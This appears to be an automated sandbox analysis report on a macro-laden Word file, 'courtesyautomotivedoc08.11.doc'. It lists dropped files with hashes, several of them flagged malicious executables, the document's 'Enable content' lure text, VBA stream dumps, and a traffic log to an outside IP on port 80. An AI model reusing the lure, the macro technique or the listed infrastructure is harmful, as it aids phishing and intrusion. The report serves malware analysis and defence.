...o..p...YW&+//[...........]....h....s....&...m_.)tG...s....<...].R..w..!.....A;.....I.,\.I@...&.....0[.\a?..`.#2upVW.4.{..c.JMZ..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):256595
    Entropy (8bit):7.978435362250102
    Encrypted:false
    SSDEEP:6144:qvnabj6CLx2b5lq77EL8D+NXLfaeW8JftIyhQfWS:Xbj6MxGPfq8SeS
    MD5:F99413369967D6AA9F566F87F36181E7
    SHA1:1BA1EB934E7F34344F99E558F6CE4723A13B375D
    SHA-256:F9CED4D80492BC27EBCE86308AF62DC228A5BDAB865F067F6869E74DD83EC6CF
    SHA-512:496ED10D5FFF3930C309B387042130CA94747F4ECDA72779772F73E7B1BF379411E76088EA8DC9A589085C91A18A30E9BE5D35FA4A8D85A01FB1C7FDD0DE7487
    Malicious:false
    Reputation:low
    Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^.....GU..,..:.=..3x.Q.!..AQ....... ..AA.!...fNB..C..@H..2H.......FA..!.Iw.w.I.Bz..}..z...J.....OR]U.V.........jp..%j.....A...e...*..o.mZu-.x..p.....M..Py.mx...Y......5\Q.2=...I.5\...."y+..RNO..t......ZT..OOF.u.~.......,.._y*..W...g..m=@.Od...IZ.K.6o.k]z<.**...C.O..VN....6.We.<m~.0V...o..z..@........L..A.-?y....1..EK..z.c...7i5.:..@..a......~.....X.....:....pE.S}..SQ..+..K7......?..C/..9....Si...%.4..[i-_u..+z.=.Y.........|m..{.<=.V.[.i....m.DK_)..p..,....t..W?Q.c<.Z...5.HZ...p:P..r.p.V$...S.W.3.h..-..7y2...Z..+.oQ..Ok..W..WZ".9@..6..$},}%...z..^][T..U......=z.g=.D.U~....H....].S.t`V<icu.../...R...[.-o..C/...o........Yi ......|`,..6....Goi..Z..1.D.k....Tb.4.........W..d.Mo.....je..z......m.6.WQ...[."i..X...ZT..O....{4....[dz.kQ.-o/\i..>P.Y.....x..xu..AK...W..D...+.W@...cy.x............a0....W.._.-*..V7.5=.-.:..{.2...p..5..O..W.K..^ZE.g.t
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):12288
    Entropy (8bit):5.6813929110754575
    Encrypted:false
    SSDEEP:192:XVKterkAle/rhCUxyi5aStkqkAle/rhCUxyi5aaK:Yt8kAle/l5Eint7kAle/l5Ei
    MD5:50DFFBAE40D88AC9BCE9B8764F700AF1
    SHA1:96CBDA6A084FEA97C3AF81199E1E37BEC442068B
    SHA-256:D48610288DC5FAA1C9604941C27291F911135D91B17F0CFFE351B382A5133E4C
    SHA-512:624AC8EC22A5C98318780BBF931971B4BA39CDD7D65DE9E680692D9F37DBFDEE98DAF4E6EFBE2C128963DBEA199EF3094F68426D2B64FBC104FDDDCAA9868D0B
    Malicious:false
    Reputation:low
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):2.1282331468038365
    Encrypted:false
    SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lpakwkvPlI4Vle4S4Pll4eHkUZD/W4c:4LG1ND9Pxn82+kszJYtHsz
    MD5:F8CC4A5272D7AFF36E2EFF7EFD02E883
    SHA1:C4477C54081C7C2350D5DD090C9E18AF0693EEA2
    SHA-256:34ED4911C503F7AA0E4AFDA33EE4CFAD41E84EE533C92CDC6C061D1780D3FB59
    SHA-512:8032F5C3C86E83084A7618F50FB1CE9E135B2FE96749D435763E66404FE18040181421ED90C6A632290AE2C26AE76E9BC2F5164E94BA2E7756F5F2799265D8AB
    Malicious:false
    Reputation:low
    Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):44544
    Entropy (8bit):6.056689486584974
    Encrypted:false
    SSDEEP:768:mD+ellQvZSazSRqbSEln5IyYpamDjobj8SpM:E+QWvZhSRqln5IUmDjoXV
    MD5:51138BEEA3E2C21EC44D0932C71762A8
    SHA1:8939CF35447B22DD2C6E6F443446ACC1BF986D58
    SHA-256:5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
    SHA-512:794F30FE452117FF2A26DC9D7086AAF82B639C2632AC2E381A81F5239CAAEC7C96922BA5D2D90BFD8D74F0A6CD4F79FBDA63E14C6B779E5CF6834C13E4E45E7D
    Malicious:true
    Antivirus:
    • Antivirus: Metadefender, Detection: 0%, Browse
    • Antivirus: ReversingLabs, Detection: 0%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V|.....,...,...,.eO,...,.eI,...,...,v..,.e^,...,.eY,...,.eN,...,.eK,...,Rich...,........PE..L...7.[J.................:...p...............P............................................@..................................@..x....`..`g......................P...<I..8...........................8&..@...p...l............@..@....................text....9.......:.................. ..`.data........P.......>..............@....rsrc...`g...`...h...B..............@..@.reloc..P...........................@..B..[J0.../.[J=...o.[JH.....[JS.....[J`...........KERNEL32.dll.USER32.dll.msvcrt.dll.imagehlp.dll.ntdll.dll...............................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
    Category:dropped
    Size (bytes):360448
    Entropy (8bit):4.669486804663653
    Encrypted:false
    SSDEEP:6144:tYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:eCwMfjSlE+A4eguRJDtPZIG46FkEH9
    MD5:CE600629752CAF6529025A0EE60FB7B3
    SHA1:8D8DDA1D4FF66D6B5BB44F7BAFDC87EBB9B54DE6
    SHA-256:BDB9DAB286CCCCF1D315A027597065C51DC4BF0A87471B283FE749C146721C05
    SHA-512:4D2AC51A9AB38DCE21895A22878F6533C27371302A2F35C0F337FE05C3021CAA838D80C76DC7E4CA44D47E962973B52F2B4AA4C7BCD10E662DEA6C1645C05FE9
    Malicious:true
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):60928
    Entropy (8bit):4.160079134971716
    Encrypted:false
    SSDEEP:768:Fv+gRWhfvDEgXn5UvkjzhDMGedfJMnrxbVDLtnDxSOT4vW2Gvw8MGKaUSh:FvKf75n5hzJM5dfJMnrzWlGdMGKaR
    MD5:F156F878AF6F57640ECE3F2C940DCDF1
    SHA1:25E9D1952D853CBD69494AC57D826BCD3BF70B7B
    SHA-256:B299E7ECB4D5B7C460DA311678E12E22164325B930FCAB02ED91E984D00ECF33
    SHA-512:35DAE312C241A66001822DADED91FFF0CE14075923F834F2420373F9DD5EE63B2DF68A7843085372E6FE3A4C3CF30E792F049CEA21AC02A4F58243CD3F87CF79
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...I...B...C...D...E...F...G...H...;...J...K...L...M...N...O...P...Q...R...S.......i...V...W...X...Y...Z...^...\...].......j...`.......b...c...d...e...f...g...h...[.......k...l...u...n...o...p...q...r...s...t..._.......................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Aug 11 23:38:17 2022, length=2256492, window=hide
    Category:dropped
    Size (bytes):1094
    Entropy (8bit):4.567016459408874
    Encrypted:false
    SSDEEP:12:8cJlgXg/XAlCPCHaXNBQtB/SxXX+W2G1bY5iFvicvbpAgSISxDtZ3YilMMEpxRl3:8cd/XT9SUo4ZF6eOXxDv3qsu7D
    MD5:16ACDC6C3148D948E793D54D0CC855F9
    SHA1:34618CE6E3713BF88184935233CCBFE78792AAD5
    SHA-256:4C9122002A5D221CF6EEDF9377D16251542447E8686FE514EBF0FFF21C483458
    SHA-512:219FFD7BD5632036B00F94BD7C9565600E172C997F1D560FB0809237E4DC2D2C05CF9C929FA350BD5D6B66C8A629797EFCB71655876D5BE68FFF4655032B307D
    Malicious:false
    Preview:L..................F.... ... d...3.. d...3..djT....ln"..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.ln"..U.. .COURTE~1.DOC..j......hT..hT..*...r.....'...............c.o.u.r.t.e.s.y.a.u.t.o.m.o.t.i.v.e.d.o.c.0.8...1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\courtesyautomotivedoc08.11.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.o.u.r.t.e.s.y.a.u.t.o.m.o.t.i.v.e.d.o.c.0.8...1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):103
    Entropy (8bit):4.64907659762003
    Encrypted:false
    SSDEEP:3:bDuMJleLXRxcAgMCmX1dSxcAgMCv:bC9RxcSWxcSs
    MD5:096683A47B04CB33D2F0018C0B926F12
    SHA1:67871655DA0F274A618A1284B6C8FE5185CC0174
    SHA-256:542D2649FBB017DBA05E8AF20181C933F0FED51A2BC568323C4C123238505EC9
    SHA-512:4912E7A2160D08E75E39F025822D772471215030D75F6EA8D49DD5C828D9115D55B66EFF0D0CE94E4BE85DC2BEB6D6A77A3CEC36DEFEED77C9593D7047182020
    Malicious:false
    Preview:[folders]..Templates.LNK=0..courtesyautomotivedoc08.11.LNK=0..[doc]..courtesyautomotivedoc08.11.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
    MD5:7CFA404FD881AF8DF49EA584FE153C61
    SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
    SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
    SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Little-endian UTF-16 Unicode text, with no line terminators
    Category:dropped
    Size (bytes):2
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:Qn:Qn
    MD5:F3B25701FE362EC84616A93A45CE9998
    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
    Malicious:false
    Preview:..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
    MD5:7CFA404FD881AF8DF49EA584FE153C61
    SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
    SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
    SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
    File type:Zip archive data, at least v2.0 to extract
    Entropy (8bit):7.993716000279979
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 49.01%
    • Word Microsoft Office Open XML Format document (43504/1) 43.07%
    • ZIP compressed archive (8000/1) 7.92%
    File name:courtesyautomotivedoc08.11.doc
    File size:2351271
    MD5:00e8f42e0462d4abf8a6bb6960abe5b5
    SHA1:0235d1eb73c161a7fcc944d99730d8ed0200fb8e
    SHA256:3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44
    SHA512:927b5d5c0a8230738b5e56d05f2b0c669c2a564ef013707cce466250ddddb6d779077e4a8ee75ed39bc4a6485cbf30b6ba6edc8f819b74fd3f400e6c84460f96
    SSDEEP:49152:kMZ2Nedqe2qza5yNggQYE38nhoaCuqgpuIV/gGfikxc/X6YR:5dqerz3EOhLig/gGKkxGX6YR
    TLSH:3DB533B24150779A263D137BC044B6E67936ABA68F84857C08D78D9FE931FFF204852D
    File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
    Icon Hash:e4eea2aaa4b4b4a4
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:True
    General
    Stream Path:VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:2862
    Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . . . . . . L i b . " u s e r 3 2 " . A l i a s " . K i l l T i m e . r " ( B y V a . l . . A s L o n g - , . . # . . ) . K . .
    Data Raw:01 84 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

    General
    Stream Path:PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:361
    Entropy:5.261274960217235
    Base64 Encoded:True
    Data ASCII:I D = " { B C 4 3 8 9 C 2 - 2 6 C 1 - 4 B 8 E - A 9 6 B - E 7 C 1 A F 0 E F D C 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 1 3 3 0 0 6 0 0 4 6 0 0 4 6 0 0 4 6 0 0 4 " . . D P B = " 6 2 6 0 5 3 A 0 8 5 A 1 8 5 A 1 8 5 " . . G C = " 9 3 9 1 A 2 F 3 D 2 F 4 D 2 F 4 2 D " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0
    Data Raw:49 44 3d 22 7b 42 43 34 33 38 39 43 32 2d 32 36 43 31 2d 34 42 38 45 2d 41 39 36 42 2d 45 37 43 31 41 46 30 45 46 44 43 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:41
    Entropy:3.0773844850752607
    Base64 Encoded:False
    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:ISO-8859 text, with no line terminators
    Stream Size:7
    Entropy:1.8423709931771088
    Base64 Encoded:False
    Data ASCII:a . . .
    Data Raw:cc 61 ff ff 00 00 00
    General
    Stream Path:VBA/__SRP_2
    File Type:data
    Stream Size:5100
    Entropy:1.9352060799527637
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
    General
    Stream Path:VBA/__SRP_3
    File Type:data
    Stream Size:2724
    Entropy:2.7022241373642215
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . q . . . . . . . . . . . , . . p . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . ` . ! . . . . . . . . . . . \\ . . p . . . . . . A . . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:486
    Entropy:6.302164636528835
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 3 Q d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . 1 m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
    Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 33 51 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
    TimestampSource PortDest PortSource IPDest IP
    Aug 11, 2022 17:38:26.550465107 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.655807972 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.655991077 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.663358927 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.766427994 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792161942 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792212963 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792253971 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792294025 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792332888 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792371035 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792382002 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.792409897 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792433023 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.792449951 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792465925 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.792489052 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792524099 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.792529106 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.792563915 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.792608023 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.812335968 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900171995 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900192022 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900207996 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900222063 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900233984 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900248051 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900264978 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900281906 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900315046 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900336027 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900352955 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900368929 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900386095 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900403023 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900405884 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900418997 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900424004 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900428057 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900435925 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900440931 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900453091 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900460005 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900470018 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900485992 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900492907 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900502920 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:26.900511980 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900527000 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900542974 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:26.900873899 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.004734993 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.004776001 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.004806995 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.004838943 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.004892111 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.004904032 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.004929066 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.004940987 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.004945993 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.004987001 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005026102 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005049944 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005074024 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005084038 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005095005 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005119085 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005142927 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005162954 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005173922 CEST4917380192.168.2.2245.8.146.139
